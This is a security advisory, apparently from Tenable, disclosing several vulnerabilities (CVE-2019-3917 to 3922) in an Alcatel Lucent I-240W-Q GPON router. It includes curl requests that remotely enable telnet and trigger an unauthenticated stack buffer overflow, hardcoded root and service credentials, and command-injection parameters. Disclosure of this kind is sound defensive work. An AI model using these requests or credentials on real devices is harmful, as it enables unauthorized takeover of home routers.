Synopsis
While investigating an Alcatel Lucent I-240W-Q GPON ONT with firmware 3FE54567BOZJ19, Tenable discovered multiple vulnerabilities. Note that the business unit that maintained the I-240W-Q was purchased by Nokia.
CVE-2019-3917: Remote Enabling of Telnet
Telnet is not enabled by default. However, a remote unauthenticated attacker can enable telnet on the device by sending an HTTP request.
curl http://[router ip]/ote
The attacker can also disable the telnet service.
curl http://[router ip]/otd
This vulnerability is documented in some old security blogs, but no patch was put out and no CVE was ever assigned.
CVE-2019-3918: Hard Coded Credentials
The device has a handful of hardcoded credentials:
- root/admin (telnet)
- root/huigu309 (telnet)
- CRAFTSPERSON/ALC#FGU (telnet)
- ONTUSER/SUGAR2A041 (ssh)
CVE-2019-3919: Authenticated Command Injection (usb_restore_Form)
The endpoint /GponForm/usb_restore_Form?script/ is vulnerable to blind command injection via the usb_partition parameter. A remote, authenticated attacker can use this vulnerability to execute arbitrary commands or programs on the device (e.g. dropbear).
CVE-2019-3920: Authenticated Command Injection (device_Form)
The endpoint /GponForm/device_Form?script/ is vulnerable to blind command injection via the usb_partition parameter. A remote, authenticated attacker can use this vulnerability to execute arbitrary commands or programs on the device (e.g. dropbear).
CVE-2019-3921: Authenticated Stack Buffer Overflow in WebMgr
The WebMgr process handles HTTP POST requests sent to /GponForm/usb_Form?script/. A number of the form's parameters are vulnerable to buffer overflow by unexpectedly long values. Example parameters: ftpusername, ftppassword1, ftpdirname, clientusername, clientpassword, urlbody, and webdir. They all generate a similar backtrace:
(gdb) bt #0 0x41414140 in ?? () #1 0x401156c0 in bfree () from /usr/lib/libWebs.so Cannot access memory at address 0x4141413d (gdb) info registers r0 0x208 520 r1 0x391a8 233896 r2 0x4012a590 1074963856 r3 0x5 5 r4 0x41414141 1094795585 r5 0x41414141 1094795585 r6 0x41414141 1094795585 r7 0x41414141 1094795585 r8 0x41414141 1094795585 r9 0x41414141 1094795585 r10 0x41414141 1094795585 r11 0x41414141 1094795585 r12 0xbefb9108 3204157704 sp 0x41414141 0x41414141 lr 0x401156c0 1074878144 pc 0x41414140 0x41414140 fps 0x0 0 cpsr 0x20000030 536870960
CVE-2019-3922: Unauthenticated Stack Buffer Overflow in WebMgr
A remote unauthenticated attacker can send the following request to /GponForm/fsetup_Form and trigger a stack buffer overflow.
curl -i -s -k -X $'POST' \ -H $'Host: 192.168.1.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://192.168.1.1/fsetup.html' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 1443' -H $'Cookie: hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678' \ --data-binary $'XWebPageName=fsetup&XSetup=wifi&loid_user=AAA&loid_psw=&pppoe_user=&pppoe_psw=&wifi_ssid=ChinaNet-AAAA&wifi_ch=4&wifi_enc=3&wifi_psw=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \ $'http://192.168.1.1/GponForm/fsetup_Form'
Solution
Additional References
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]